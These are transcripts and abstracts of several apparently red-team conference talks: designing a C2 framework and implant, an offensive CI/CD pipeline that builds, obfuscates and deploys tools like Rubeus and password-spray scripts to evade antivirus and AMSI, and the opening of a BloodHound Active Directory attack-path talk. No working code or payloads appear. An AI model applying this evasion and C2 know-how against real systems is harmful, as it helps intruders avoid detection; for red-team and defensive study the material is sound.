operator or the author of the module doesn't need to specifically put R host in as an option. The framework already knows that that's required. So that takes that burden off the operator or the author. And you also have includes and helpers which are down here. So these includes are other metasploit modules that you can bring into your module. And because this module is using, you know, SMPS exec and SMB, there's already a module for that. So you don't have to actually implement an entire SMB library in your module or even the PS exec process in your module. It's bringing in PowerShell and Xs because, you know, you need to execute something. So as the module author, you don't even have to worry about the payload that you're going to send the framework does it for you. And you can see here that the service file name, so this is service file name here is an option. If you haven't, you know, defined this option, it takes the defaults. So these are default behaviors. So if you haven't provided a name, it will pick, it'll just make a random one for you. And this random text alpha is another module in the framework. So you don't have to worry about, oh, okay, well, I want a random string now have to write a function for that. It's in the framework already. And those are the biggest strengths of frameworks is that as the module author, they allow you just to focus on the task that you want and not worry about, you know, things that you don't want to worry about. Okay, so where to start? Well, this is like, it seems pretty cliche, but the first thing you should really understand is what are your motivations? What does success look like? And that kind of sounds like we're at some sort of management retreat. But you kind of really need to think about what you're actually trying to achieve, because you need to build it. And you need to know what it's going to look like at the end. So you know, you might be doing this just for fun, you might be doing it just to teach yourself some stuff. You might want it to teach other people. You might be writing an internal tool if you're like a pentester or a red teamer. You might even want to sell it, you might want to open source it. And if I had to draw like some sort of parallel, I think about if you were going to build a car, it's very easy to say I'm going to build a car. But there are a lot of different types of car, right? If you want something to take your family to the beach, you probably don't want a McLaren P1. And likewise, if you want to go around the nerve of it, we can put it quick, you probably don't want, I don't know, some sort of absurd people carrier. So even though they're both cars, they are quite different and they have different features to, you know, make that goal a reality. And there are all sorts of things that you, you could think, oh, that would be really cool to have in my framework, that would be, you know, da, da, da, da, da. But if it doesn't, you know, contribute towards what you're actually trying to achieve, then it's kind of pointless. And if you miss features that you need, then you're not going to achieve your goal, and you're going to end up with something that you didn't want. So if you've never seen Moscow, this is a pretty good way to try and narrow down what you think you want. So this stands for must have, could have, sorry, must have, should have, could have and won't have. So your must haves are like mandatory things, right? These are things that your framework absolutely has to have to perform its function. Should haves are important and they add significant value, but they are not strictly mandatory to function. Could haves are nice to haves, but not really important, and won't haves are least critical, inappropriate, or undesirable. And like the won't haves, you can split into kind of two camps, I guess. You can have won't haves like period, and won't haves this time. And I'll sort of expand on this time in a minute. So what you really want to do is you want to get your goal straight and think about all the things that you think you might want in your tool. You can also take inspiration from other frameworks as well and tooling. That's perfectly okay. I don't think that's cheating because you kind of want the best parts of everything. And you know, why reinvent the wheel sometimes? You can take good ideas from all sorts of places. And that's perfectly fine in my book. And then what you want to do is narrow everything down to an attainable first release using that Moscow method. And by attainable, I mean attainable within your current skill set and your time budget. And I think a mistake that a lot of people make is to look at things that have been out there for a long time. So you look at Empire, you look at Metsploit framework, and you look at Covenant, Posh C2, and all of those well established projects. And they think that's what I want to build. I'm going to build like my version of that framework. But the thing is that those projects, they didn't get there overnight. They didn't just pop out of nowhere at the quality that they are now. Some of them are months or years old. So if you're trying to replicate that straight off the bat, you know, you've probably got easily six or 12 months worth of work. And what you're going to do is you're going to work on it for, I don't know, a couple of months or however long you can stand, you're going to get fed up with it, you're going to get demotivated, and then you're just going to put it to the side. You'll come back to it, maybe at some point, and you'll look at it, you'll look at it, and you'll think, well, I've only done about 20% of what I hoped to achieve. And you're probably not going to pick it up again. And it's going to end up in the software graveyard. So small iterative releases are easily more achievable and far more likely to keep you motivated. And you're also going to grow your project with your skill set. I mean, you look at a lot of features in a lot of advanced frameworks now. I mean, they're pretty advanced concepts. So if you're doing this to teach yourself, you know, coding, it's probably not realistic to shoot for those kinds of features or whatever. So having a small project that's 100% complete is a lot better, and it's a lot more satisfying than a large project that's 10% or 20% complete. So when I say attainable first release, it's going to be like probably the bare minimum of what will make a C2 framework function, no bells or whistles, but it's something to aim for, right? So you can set yourself a schedule. So you're going to say, I'm going to target my first release, my initial release in one month or whatever you think is realistic. So you've got your Moscow, you've got your must haves and your should haves, and you're probably going to prioritize those the most. So you could haves, you're probably not going to really worry about too much, because you just want something that's going to function, that's going to work. And you need to be cognizant of scope creep. So it's really easy to just think, I'll just add this, I'll just add this. People post things on Twitter all the time, or just, did you know you could do this or new techniques, blah, blah, blah, blah, and it's really easy just to try and add those in. When really what you want to do is just stick to what you had planned for this release. And if you see cool stuff coming into the public domain, you can say, well, okay, well, I'm not going to do it now. Maybe I'll do it in the next release. And for God's sake, pace yourself. So two hours a day for a month is not the same as 12 hours on four Fridays in a month. And maybe this is just a personal thing for me. But little and often is, it's just a more enjoyable way to code than having to sit at your desk for however many hours because you feel like you need to get something out. So let's talk about languages for a sec. There are, you know, a billion different languages out there. And you're going to have to decide on something for your server and your implant and sort of depending on your model, you might consider writing a client as well for the operators. But we're all just, I'm just going to sort of focus on the server and the implant. For the server side, I think you're much better off building off a framework that already exists some sort of web framework. So you have Python ones like Flas and Django. Lots of different ones in C sharp, you have blazer, which provides, you know, like a nice web UI, you can have something that's driven more by API is or RPC. And you have lots of those like view, react and angular. And on the implant side, you kind of have to think about maybe we'll mean this goes back to your goals really been what it what what platform you really want to target with your framework. I mean, you can make your framework implants agnostic a lot of a lot of them already do that like mystic, you can write your own implants for a framework. And that would be, you know, really great if your framework did that. But you probably also want to include an implant, just to make it easier for people to pick up and use. And so you have OS specific languages like C sharp target the dotnet framework, you have swift on Mac OS, you have languages that cross compile, like Nim and go and rust. And then you have actual proper cross platform languages like dotnet dotnet core and sort of Python. But you certainly need to sort of consider how these elements are going to talk to each other. And which language facilitates that best. So, you know, I've already said that the control server should provide a means of communicating with your implant over any protocol or any means you want. So you have to consider is the framework that I'm choosing going to be able to facilitate that. Can I do that in Python? Can I do that in, you know, in Python? And then you kind of consider, well, if my chosen language doesn't really do that, do I need to consider a different language? And if you don't really know that language, is it worth learning? Or is it worth sticking to what you know and just trying to make do the best you can? I think that's a decision only like you can make based on your goals and your priorities. If you're learning, if you're doing this as a learning process, then maybe it's worth it. Maybe you specifically want to use this project as an opportunity to learn, you know, C sharp, for example, and that's pretty, pretty popular choice. Then yeah, by all means, step out of your comfort zone. And that kind of goes back to the attainable first release thing is that if you're learning something new, you've got to like start small with it. So in terms of design patterns, there are two that I really go for. The first is this command design pattern. And I think this is pretty good for picturing the flow of stuff between the different components. And by components, I mean like separate components such as the server and the implant and the operator, not really internal to any one of those. So we have the operator, which is kind of like the clients. And the operator wants to send a task to an implant. So you're probably going to send some information, maybe it's over an API, you're going to post some information, or post this data to your team server, which is kind of like the director in this design pattern moment. So in this example, I'm simply, I've got a simple task model that has a command and some arguments, and I want to task an implant that we're going to identify by a GUID. The server then takes that task and sends it to the implant. So that's kind of the command. And then the implant, which is the receiver is going to execute that task. Now I've highlighted task GUID here, because it's in this model that the server deals with, but it's not in the model that the operator sends. So the server, if I want my server to track like task progress with the implant, it's going to need something. So my server, excuse me, in this example, adds a GUID to all of the tasks. And then when the implant can, when the implant talks back to the server, it can report, it can use the same GUID so that the server can track commands with the implant. And this kind of brings me on to the subject of contracts. So you have contracts between the different elements within your, the overall solution. So you have contracts between the operator and the server, the server and the implant, and maybe even the server and any storage that you want. So if you're storing data so you can start and stop your team server without losing data. Then what you really need is different models for each of those contracts. Don't try and use the same model between every element because you're just going to get a little bit unstuck. So here's a code example of a task request. So this is what an operator might post to the server. This is a request. So it's got a command, an array of arguments, and an artifact. So if this was like an execute assembly command, the artifact would be like the whole assembly. So you're going to push like, I don't know, you're going to push Rubius down to your implant and you're going to tell it to execute with these arguments. The server will then add on that task GUID and give me back that GUID. So as the operator, I can then use that GUID to check the status of that task. And when I'm asking for that, I don't necessarily, I mean, you might want to, it's kind of up to you. You might not want all of this original data back. Like you don't, you might not, I don't need to see like the whole assembly coming back. I don't need to have Rubius just going backwards and forwards on the wire between me and the server. All I really want maybe is just the result and the status. And you're going to find that, you know, if you're using like something like entity framework for storage, if you're using C sharp, you have to decorate your classes with all sorts of things. So you have to have like attributes on your properties that define the primary keys and stuff. And that information just doesn't need to be coming back to the operator. It doesn't need to be going to the implant. So at every point, you have to try to translate each model to a different model and then pass it along the chain. There's also this template method pattern. And this is pretty good for planning, you know, plan more carefully planning your code, what's your actual code going to look like. And I'm sorry that all of my code examples are in C sharp, mainly because that's all I really know. But also that's what people are kind of more interested in, I think. So on the left, I've got an abstract class. It's going to act as like a building block to build custom listeners on my server. I'm going to have a protected field at the top, which is an itask manager. And that is an interface that has these methods on it. So Q task is the method that an operator would use the task and agent. So it would take in like a GUID. And I've just put a byte array, but this would be the implant task model. And then get tasks and receive output will be used on like the listener side so that when an implant is talking to the listener, it can just use this task manager just to grab the tasks and any tasks that are queued for it. And also give the server any output that the implant is sending. And then the listener, it just has this init or initialize method to bring in that task manager. And then just to start and stop. So let's have a look at what that could look like in C sharp. So this is my abstract class. You can see I've got the itask manager here. And this init just brings in the task manager and just assigns it to that field. And then it has two abstract methods, start and stop. And when somebody comes along and implements their own custom listener, they inherit from this listener class. And this is the entire class here. It's obviously not very functional. It's just an example. But you can see I've highlighted where it would use the task manager. And as the author of the custom listener, you don't have to worry about where the task manager is coming from or how it works. Because you've implemented this abstract class, the framework is taking care of that for you. And all you have to do is just the task manager is there is a field for you to use as appropriate. So to get tasks, you just call get tasks and to send any output into the server to like process, you just call receive output. So abstraction and interfaces are just they're just so useful. In terms of any implant that you're going to write, base primitives are better in my view than I call it command proliferation. And you can see some CT tools just have like a bazillion, you type help whatever and just get a bazillion commands that you can execute. And like me, I find it a bit overwhelming because I don't know, it's just a lot. But it's also not that like flexible for the operator. So let's use mimicats as an example here, you could build in a command to your framework that will automatically push mimicats down to the implant, load it up in some way, execute it and send the results back. You could do that for seatbelt and for Rubius. And it's very, you know, okay, it's very nice just to have an automated way just to push all of these assemblies down. But then as soon as the user, you know, the operator says, well, I want to push down something custom. You've not made it very easy to do that. So the base primitives are more about what allows these commands to actually happen. So mimicats is tied to manual mapping in like C sharp anyway. So instead of providing like a mimicats command, you could just provide some sort of means of just manual mapping in your implant. And that will allow the user just to send down an arbitrary DLL or executable arbitrary commands, just map it into the implant, execute it and send the results back. You can also, you know, expose reflective DLLs, dot net reflection, PowerShell, sockets, you know, whatever you want. But the closer or the more easily you expose these base primitives to your operator, the more easily they can write custom commands for your implant. And in terms of commands, this is something that I see quite often, not even not just in like C2 tools, but all sorts of tools that bring in some sort of user input. This, you know, the command is a string. And they're just, well, this is a switch statement, but it could easily be like if else, if else, if else, if if the command equals this, do this. And it's just not good. It's not very flexible, obviously. It's difficult to expand and maintain. You know, if you want to add another one in here, it's going to be like massive. And if you've got a more complicated method than these, it's just, just don't, it's difficult to handle exceptions. You could wrap this whole thing in like a try catch, in which case you're only catching like maybe like generic exceptions, or you could wrap each one of these in a try catch. And that just makes it even bigger. You can see we've got code duplication. So we're requesting this like get current directory a whole bunch of times, which isn't really a problem for something so short. But if it's something more complicated, then it that just becomes untenable. It's not particularly performant because most of the time I think, especially if it's an if LCFL, if it always starts from the top, you know, you don't know, don't know, don't know, don't know. We're also forcing everything to be a string. And it's just, you know, it's just ugly. This is not a good way to code something. So what's a better example, perhaps is again, to implement those abstracts. So I've got an abstract class here, which is called implant command. It has a string which is called command, I probably should have called it name or something, but this is like the name of the command. And it's got an abstract method called execute will bring in the task that's been sent down to it. And it has another in it which brings in a class in this case, in case it's called implant. But implant has several public methods. You can see it on this right hand side here for sending results back, sending an error back and all sorts of things. So the implant class again is not something the operator will care about, but you can expose public methods on it for them to do useful things. So like the listener example, we want to create our own command that will inherit from implant command. We give it a name in this case, it's just LS. I've also thrown like sharp split in here as an example. As an example of like decoupling a lot of like the back end execution from the actual command. And that means that as a user if I want to implement another command that uses like sharp split, they can do that really easily. Again, we're just making it as flexible as we can. And of course, abstracts, you are forced to implement. So you have to put some sort of implementation in when you override this method. And you can, as the author, you can just put whatever you want in there. And again, you don't have to worry about the task. It automatically is brought into the command for you. You don't have to worry about where implant is coming from. It's automatically done for you. You just call the methods that you want. And then you can, this is within that implant class is that at some point we call load commands. And we can use reflection to automatically instantiate every type of implant command and initialize them so they're ready to be used. And then that handle task method, where in the previous example was that big old switch case, this is what it would look like. So all we need to do is find the class that has the name that we're looking for, you know, in the actual task that comes down. If we didn't find it, we send an error back saying that, well, the command isn't found. Otherwise, we just execute it. I got another example here using attributes, but I'm actually running out of time, so I have to skip to the summary. So to start with, absolutely know your goals, know what you're trying to build and why you're trying to build it. Only by knowing your goals will you really understand what features you need to put into your framework. But I'd also encourage you to focus on framework features rather than C2 features. So by C2 features, I don't know, I guess I'm referring to command proliferation again. But I would definitely focus, especially in the early days of your framework, is focus on those framework elements. You really want to provide the operators the means to customize and expand your framework the way they want to do it. Prioritize those base primitives on your implant and provide an easy means for the operators to interact with them. Abstracts and interfaces are incredibly useful. I can't think really of a better way to provide that extensibility to the operators. Plan small, attainable releases. Don't try and do a big bang release for your first one. And if this is something that you want to maintain over the long term, I would also say to limit each release to only one big feature. So usually if you look at release notes for software, most of them, the vast majority of the changes are bug fixes. You'll then get other types of minor improvements. And you'll probably only really see like one or maybe two like big new features. So that is a kind of software design lifecycle thing that I would really encourage. Don't try and change too much in one go. Yeah, I think that's pretty much it. I hope the talk was useful. If you've got any questions, please let me know. I'm going to try and be around for a Q&A during the village. If not, feel free to hit me up on any of those socials I shared at the beginning. I hope you enjoy the rest of the conference. Thanks very much.
Over recent years, there has been a huge boom in open-source C2 frameworks hitting the information security space. So much so they made a website and a logo - that’s how you know things are serious! Such a trend naturally drives more people towards taking on the gauntlet but all too often it becomes an insurmountable challenge and another dashed dream of the aspiring red teamer, or veteran alike. Believe me when I say - I’ve been there. I’ve felt the pain, the frustration, the imposter syndrome. Heck, I still do. However, I’ve (mostly) come out the other side with some hard learned lessons. Those lessons are the subject of this talk. The goal is not to write or provide code. We shall discuss how to approach initial design ideas; decide what is important and what is not; anticipate and deal with potential problem areas; consider different use cases and perspectives; and more. If you are interested in building your own C2 framework, contributing to existing frameworks, or even software development in general, there’s something in this talk for you.
10.5446/54341 (DOI)
everyone, and thank you for joining my talk. My name is Gil Beton, and today I'm going to talk about Red Team challenges. I will also demonstrate how we tackled these challenges in our team and enable you to do so in yours. Before we dive in a bit about myself, I'm originally from Israel, but currently based in Singapore. Hacking was always part of my life, resulting me in trying to figure out how I utilize technology and science in order to basically make my life easier. I have over five years of experience within the cybersecurity industry where I started from application penetration tests through infrastructure engagements and Red Teaming. My expertise lies around enterprise security and the related aspects of it. Today, I work at Signia Consulting as an offensive security engineer being part of its security research team. I am available on many social networks which I listed here, so feel free to reach out. First, let me give you some context. We have to admit it, Red and Purple Teaming became harder. Throughout the past years, Red Teamers are struggling with challenges during engagements. This is because organizations lifted up their detection capabilities and also integrated advanced security solutions. This caused the execution of even basic Red Team tasks to get complicated. Organizations have also a variety of products and vendors incorporated in their networks, making techniques that worked in one organization to fail or get detected on another. Logging and monitoring capabilities were also enhanced. We are recorded 24-7 by the Big Brother team and its SOC siblings, so avoid triggering alerts during an operation became a challenge by itself. To handle the situation, adversaries spend even more time on the reponisization phase, and this is done prior and during the operation. Many times these tasks are repetitive and sometimes cause delays due to technical issues. And these technical issues we have all experienced before. Let me ask you a question. How many times have you reponized the same tool? Or how many times have you helped a colleague to use a technique that you found or used? Speaking about colleagues, while working with a growing team that are divided across multiple engagements, we realized that new challenges were added. These challenges include working from home due to the COVID era or back-to-back engagements, so new developments that team members created got lost as soon as they finished their engagements. So we understood that we want to have a better platform to collaborate on. In my opinion, having a base standard can enable equal capabilities across your team members. Now, whenever we do develop or discover a new capability, we have to somehow store it, right? There are many recommendations and methodologies out there, and every day a new exploit technique or tool are released. So sometimes it's hard to follow and incorporate every technique in your methodologies while being busy with multiple engagements. Security teams are also sharing thoughts during whole conversations or coffee breaks, but memorizing and storing this entire content in an efficient way became complicated. So until Elon Musk will provide us his neural link, we have to find a solution. We understood that we want to import more automation into our engagements. As we want to reduce the time on repetitive tasks, which we are not really interested in, we know that the community already adapted the CI-CD pipeline's concept to automate tasks that are related to offensive tool weaponization. Offensive CI-CD pipelines have been around for a couple of years, with the goal of helping Red teams to automate their tasks. I'm not going to talk in detail about CI-CD, but we are going to dive into the advantages of using it for offensive needs. I truly believe that we cannot automate the entire team operation as we need to bring our own expertise, knowledge, and way of thinking. We want to have a mind behind the operation who can take decisions in real time and according to the feedback he receives. So then you will be able to put more focus on bypassing new barriers which he never tackled before. We started exploring the CI-CD area and performed a research that ended up with a pain that we really wanted to solve. This pain pushed us to design and develop our own offensive pipeline framework while focusing on the needs of our growing adversarial team. Such needs include simplicity. As being part of a growing team, we wanted to onboard new members to use that concept easily and also make it even simpler for us so the migration will be faster. There is also a need for modularity. The framework must allow the developed techniques to be packaged individually so we can mix between them when assembling pipelines that weaponize different tools. We wanted that the framework will be able to maintain itself so we don't add overhead to ourselves by maintaining it. We are looking for a system that anyone can contribute to so the efforts will be gained from each and every team member. This is because we have all many engagements and any of our team members solving complex challenges that we can then share back to our offensive pipeline framework. We wanted also that the environments infrastructure be controlled by us since the sources and the tools we are trying to recognize considered malicious and we don't want them to get analyzed or blocked. Thus, having these frameworks on a SAS solution could create obstacles throughout the way. Also, while performing a RETIN, you sometimes need a specific tool. This tool can aid you with achieving your goal and we all know that we may lose the operation when having delays during it. We have to remember that each engagement gets different artifacts so it will not affect other engagement if the device and the collection of the tools will be lost its reputation. But now considering all these needs, we ended up choosing GitLab as the core of our framework. If you are looking at the high level description, we may predict that it can answer our needs. Let me explain why. We researched a variety of frameworks such as Jenkins, CircleCI, GitHub Actions and AppVio which served us for the past year where we learned the power of having CICD concepts within your security needs. These tools didn't really come up with our needs. Even GitLab was not perfect. I actually started going over their source code when I saw a possible constraint. But still, high level is gibberish. So let's discuss the technical aspects of it. GitLab started off being code repository version control allowing you to store and manage sources of your tools. GitLab also provides a restful API which allows you to automate anything that you can basically do manually. It comes together with a detailed documentation that can save you some time when you try to figure out how to approach a code. A must-have feature is the GitLab CI providing you with the ability to create pipeline jobs which I refer as recipes. This is done in a simple and organized manner through the YAML format files. The CICD also offers multiple integrations to different systems where you can execute your job recipes. For example, as part of the CI concept, you need to execute your jobs in an operating system, either Linux or Windows. It can be on a single server or on a container. And having support with Docker and Kubernetes can help you with achieving the goal faster. Jobs can also be executed on specified conditions. For example, on a push that you just did to your repository or whenever another pipeline just ended successfully or being triggered by another pipeline. The multi-piled pipeline support allows to trigger several pipelines through executing only one. For example, when we perform a rating, we tend to use a collection of tools. And we don't want to weaponize them one by one, right? We want to trigger one pipeline that will deliver all of them to ourselves. I believe that this is just the tip of the iceberg. And I'm pretty sure that you'll find additional features to use in the future. Let's see a simple example of an offensive pipeline recipe in motion. The pipeline starts off cloning the Ruby's tool, a C-shop tool from the code repository. Then the tool gets built using a job that we define containing the dependencies of MS build. The compiled binary passes to the next stage where it gets obfuscated using Confuser EX. The confused binary then passes to the next stage where it gets wrapped by a.NET assembly loader, letting us execute a.NET tool via PowerShell. Finally, it gets deployed to your favorite bucket, so you can download it from anywhere you want. In addition, we also deploy it here to our.pundrop server, which is a server that allows you to manage the way you download your files. Another example can go with PowerShell, where we use the tool Invoke Domain Password Spray. In this time, we don't need to build it but aggregate it from few PowerShell scripts. The combined PowerShell script is then passes to the next stage where it gets obfuscated with Shimera, a tool that designed to bypass AMSI and IT virus when obfuscating PowerShell scripts. Then it goes directly to the last stage where it gets deployed to our.pundrop server, so we'll be able to download and execute it on the targeted environment. In the same way, we may add additional sources of different tools and define the pipelines with jobs that we already developed. This is where the modularity plays its significant role. For desert, we can use the pipeline triggering options, or GitLab API, to trigger multiple pipelines based on different groupings. This enables us to weaponize tens and hundreds of tools in minutes. Today, I want to introduce Scalops. Scalops is a framework that empowers RedTins by enabling them to put more focus on what they need to do instead of how to do it. This can be achieved by designing great recipes. Let's dive in to see the possibilities of this framework. After we authenticate to our GitLab, we can see that it contains few repositories. The first one is the CI recipes. The CI recipes is a collection of all the YAML files that contain the jobs that we are using to weaponize our tools. The three other repositories are tools that we want to weaponize. Now, let's say we want to add additional tools. In this case, we want to add the sharp IDR checker. What we're going to do is enter the CI recipes tool, the CI recipes repository, and add the relevant direction for the sharp IDR checker tool. This time, we will use the Web IDE, which is very useful here. You will see few sections within this repository. The relevant repository for the tools is the Tools Controller, where you can see the recipes of the different tools we want to weaponize. The Tools Index contains all the tools that are imported to the GitLab instance. To add the additional tool, we have to create an additional object within this array and provide it with the sharp IDR checker Git repository link. We have to also specify the name of the project in order for the automation to not to distinct between the other projects. Also, create a recipe for it so it can be automated with the weaponization of itself. Because its recipe is not existing yet, we have to create it using a new file. Because the sharp IDR checker is a C-sharp file that was built seemingly the same to built and structured, the same as Rubyuse, we can actually copy the same recipe and change the relevant namings. We have to remember which stages are we going to execute. In this case, we are going to build, obfuscate and deploy it. Now, all the relevant jobs are included within the yamls above. Now, when we commit the Tools Index, we actually trigger a pipeline that automatically imports the tool. You can see that the pipeline was triggered below and a job was created. We let the job to work and see how we designed it to do it. Under the CI maintain, we included many things that maintain the framework and the infrastructure itself. In Tools Import, we have the Import Public Tools job. It reads the Tools Index file and compare it with the existing project within our GitLab instance. Eventually it imports the leftover tools. As you can see, the job was succeeded. We also have the API output here. We can see that Sharp IDR Checker was added to our projects list. Let's trigger its pipeline and see what happens. If you remember, we pointed it at build obfuscate and deploy stages. As you can see, there are three different stages with each job on each of them. Let's understand each and every job. Let's go to the build job, which will possibly be under the CI builders in sharptools.yaml. Here, we're using a customized Windows container where we created it to contain the MS build and all its relevant dependencies to build C sharp tools. It will compile it with the release configuration and eventually upload it to the job artifact so the next job will be able to pick it up. The next stage is obfuscating with the Confuser EX, which will be under CI obfuscations. The Confuser EX also executed on a customized container that we created for it. It starts off fetching the artifact from the previous job and executing the Confuser EX features to obfuscate the compile binary. Eventually, it will also upload the compile obfuscated binary to the job artifact so the next job will be able to pick it up. The last job is deploy to pondrop. Let's take a look at what it is. It will be under the CI deployers pondrop deploy pondrop job. It will be executed on a Linux container and if you notice, we are actually weaponizing our tool through two different operating systems with different dependencies. This is done in no time. For deploying to pondrop, we have to provide this job relevant variables that it will be able to reach it and upload the files with the relevant access. Since we didn't provide these variables, this job will be failed. Let's leave it here and go to take a look at the multi pipeline feature. This will also be part of the CI recipes and we want actually to build and trigger the pipeline of the three repositories that we had. We already made an AD YAML under the CI multi pipeline folder where there are three different jobs that actually trigger the pipeline of the other repositories. When we supply the condition to execute these jobs are when you supply the CI multi trigger variable together with the relevant value and in that way, we can tag different group of tools in order to trigger their pipelines together in an efficient way. Let's execute the pipeline of the CI recipes in order to choose the relevant pipeline. As you can see, we have the CI multi trigger variable here which execute multiple pipelines. We want to execute all of them and they all have the all term. Since we want to deploy them to our pondrop server, we have to provide its URL and also its write key. We'll copy it and enter into the variables. We can extract the write key from this green button. Don't enter this. Just take the write key. Now we can run the pipeline and see that the relevant repositories pipelines were triggered directly from here. We can see that PowerApp SQL was triggered, Rubyus and also Godi. These tools are made from three different languages that we wanted to show you. Rubyus passes through the build and deploy and we did with Sharpy the outchecker because we copied that. PowerApp SQL goes through Shimmera and deployment and Godi just go to get built and being deployed. Now we'll wait for the pipelines to finish in order to see what happened. Green indicates that everything was done successfully. Let's take a look at the output of the PowerApp SQL jobs so we can understand what really happened. We see that a lot of obfuscation values here and we see that it also uploaded the artifact for the next job. Here in the pwn drop deploy we'll be able to see that the job succeeded and we can see also the response from the pwn drop. It means that all the files that we just created, all the pipelines should be right here deployed. Let's change the way that Shimmera is being downloaded and take a look at the file. As you can see all the strings look obfuscated and randomized even the functions name so it looks very useful. The last thing I wanted to show you is the Docker files. We are actually storing our customized Docker files within the maintain folder where there is a job that can pick them up and build them on top of another container. This is only supported with Linux and is maintained through a Google project named Kaniko. We actually can take this Docker file and build it through our pipeline managing all the infrastructure and this framework as a code. You can see that we have a special variable to trigger that kind of pipeline. If we'll take a look at the CI recipes pipeline and try to trigger it we'll be able to provide the name of the Docker files we want to build and push. Docker file build Linux is the name of the variable and now we will enter the name of the Docker file, the prefix of it that we want to actually build and push. As you can see a new job was created named build Linux container and this job can be found under the CI container builders where it actually uses the Kaniko project. Eventually it pushes the container to our private container registry. Great. So hope you enjoyed the demo and after we've seen all the magic let's understand what is the infrastructure running behind the scenes of this framework. So we start off having the GitLab instance and this GitLab instance comes with the built-in CI CD. To execute our jobs we are using Kubernetes cluster where we have two different node pools. One node pool for executing Linux related jobs and the other one for executing Windows related jobs. In order for the Kubernetes cluster to communicate with the GitLab instance, GitLab created something called GitLab Runner which is a help deployment that you can deploy to your Kubernetes cluster which will act as a proxy between the GitLab instance and the Kubernetes cluster. It will receive jobs from the GitLab instance and instruct the Kubernetes cluster how to execute them. We also created another GitLab Runner deployment that is responsible for the Windows related jobs. Our Kubernetes cluster is connected to our container registry where we are storing our customers containers to use during the operation and the pipeline execution. Now having this framework on-prem can be nice and great. Let's assume that we can also shift it to the cloud and using in this example Google Cloud resources in order to host it. And in this time we created the Kubernetes engine together with Google container registry which communicate perfect where we attached a service account with the relevant permissions to push and pull containers. The Kubernetes engine and the GitLab instance can communicate internally because they are sitting on the same VPC. We also added a Google Cloud storage to allow ourselves storing some utilities that we will need during our pipelines. We also created a firewall to allow us operate the framework and use it and actually enjoy it without exposing it to the whole internet. Everything is sitting on a single GCP project where we can maintain it in one place. The GitLab then can import tools from a remote Git repositories. And as part of the scale-ups framework we are releasing a Terraform script that will allow you to deploy the exact same environment in your cloud. This comes with the built-in recipes we've just shown before. All you need is a GCP subscription and a web browser. Refer to the project's repository and follow the instructions. A few words about the cloud cost. We can divide it to idle and to per job because we want the framework to be waiting for us so when we want to operate it and run the pipelines. But we're not always continuously running pipelines. So there is a need to operate two instances that are utilizing most of our credit. Also there is a per job credit that takes out when you provision new nodes. And this is very tricky because you may provision one node and create one job which will translate it into one pod. But if you create 10 jobs simultaneously they will use the same credit. Unless you plan to supply weaponized tools to the world community the bottom line is that you'll have to pay less than 100 US dollars a month in order to use this framework. A digital thought that came from creating the framework and also this presentation is that this can be a community-driven framework. We just released the infrastructure, the code of the infrastructure and also the CI Recipes repository itself allowing people to collaborate and share their techniques through one place where anyone can enjoy and share. This can be done in the same way people are sharing today Cobalt Strike aggressive scripts. There will be another problem coming up to you after using this framework because now you will be able to speed up the tasks that you're doing when you perform in team engagements. Finding yourself collecting all the the enumeration reconnaissance a lot of information in no time so you'll find yourself trying to understand how you process all this data now. Also if your team will really take the decision to use this framework in an efficient way you may end up finding an operator executing a task that bypassed few security defensive tools where the operator will not even know how we bypass them. I'm not into not knowing what you're doing but this is the thing that can happen which may enable additional people to perform adversary simulations and red teams. Also I believe that the question about command and controls came up to your mind and we are not planning on replacing them with the offensive pipelines but we do have to use them together because command controls are very monitored tools by the detection and prevention security tools and also they are not they are not getting enough updates so you may find yourself using an old update of some tool and and trying to figure out how to load a new tool. Now also with the offensive pipelines you may find yourself grabbing your beacon agent or grant from your favorite command control perform the obfuscation and evasion techniques on it send it back to some hosting server so we will be able to download and execute it on the targeted environment without getting detected. I also listed here the references to the technologies that these frameworks lean on. You can go ahead to extend your knowledge about every byte and bit that actually created this framework. I want to take anyone who took part in designing this framework and also for anyone who helped me with preparing this presentation so thank you very much and also thank you for staying up until now. I hope that you enjoy the talk and consider to adapt CICD concepts into your red teams. I will be taking your questions, feedbacks and comments on the discord server. See you there. Bye bye!
Evolving endpoint protection software with enhanced detection capabilities and greater visibility coverage have been taking red team and purple team operation’s complexity to a higher level. The current situation forces adversaries to take precautions and invest much more time in the weaponization phase to overcome prevention and detection mechanisms. The community has adapted CI/CD pipelines to automate tasks related to offensive tools weaponization. Offensive CI/CD pipelines have been around for a couple of years, with the goal of helping red teams to automate offensive tools creation and evasion techniques implementation. As part of this evolution, we designed and built our own offensive CI/CD pipeline framework that is simple to use, modular, self-managed, automated, collaborative, and fast. Our framework leverages Infrastructure as Code (IaC) to fully automate the deployment of our offensive CI/CD pipeline framework with built in recipes for evading host and network detections. Each recipe is modular and can be customized to fit red team or purple team requirements, such as proprietary techniques or imitation of specific threat actor TTPs.The framework leverages Gitlab CI/CD in conjunction with Kubernetes cluster to automate and manage the process of building and deploying offensive tools at scale. In this talk, we will discuss the essentials of offensive pipeline and present our innovative approach, while referring to the challenges we solved, and demonstrate how you can leverage our offensive CI/CD framework to empower red team and purple team operations.
10.5446/54342 (DOI)
Hi, my name is Jonas and I'm going to present a tool that I've made called Impround. It's a tool for finding attack paths in Active Directory that breaks the tier model using Bloodhound. So, first I will talk a little bit about myself so you get to know me better and then I will talk about Active Directory security and how you can find attack paths using the awesome tool Bloodhound. Then I will talk a little bit about the Active Directory tier model and how you can find tier breaking attack paths using Impround. At last I would like to talk about what Impround cannot do so what you have to find manually. So, again my name is Jonas and I work for a small company in Denmark called Improsec. I work primarily with Active Directory security so I do assessments where I help clients find security holes in their Active Directory configuration and attack paths that could lead no privilege user to domain admin access. But what I do most of the time is actually to help clients fix these problems and implement security measures like implementing tiering. I've only been in the industry for two years so I'm definitely not as experienced as some of the other speakers but I hope I will still be able to entertain you for the next, yeah, that will be 25 minutes or so. So Active Directory is an old system from year 2000 I think. There's been really many vulnerabilities found over the years and many which Microsoft has not been able to patch because the problems are like part of the fundamentals protocols and systems so it's not something you can patch. One big problem in like old systems is that if you have two users logging into the same computer then the users can steal the credentials of the other user from memory. So credentials stealing, another big problem in Active Directory is the control drift and by that I mean the permissions configured in the ACLs of the Active Directory because in large environments there will be so many permissions configured and it's very difficult to get an overview of all these permissions and what the implications are for these permissions. So credential stealing and control drift is the two main security vulnerabilities that I will focus on in this presentation. So yeah to make matters even worse for the systems admins and defenders it's actually quite easy to find chain these misconfigurations and vulnerabilities because you can use the awesome bloodhound to identify these attack paths for you. So what bloodhound will do is that it collects a lot of data from the DAG and puts it into a graph database and then you can use bloodhound to find the shortest path from a compromised user to a given target. In the example I have in the slides it's a user called KR and a long attack path to the domain admins groups that it will have taken hours to find this attack path manually so 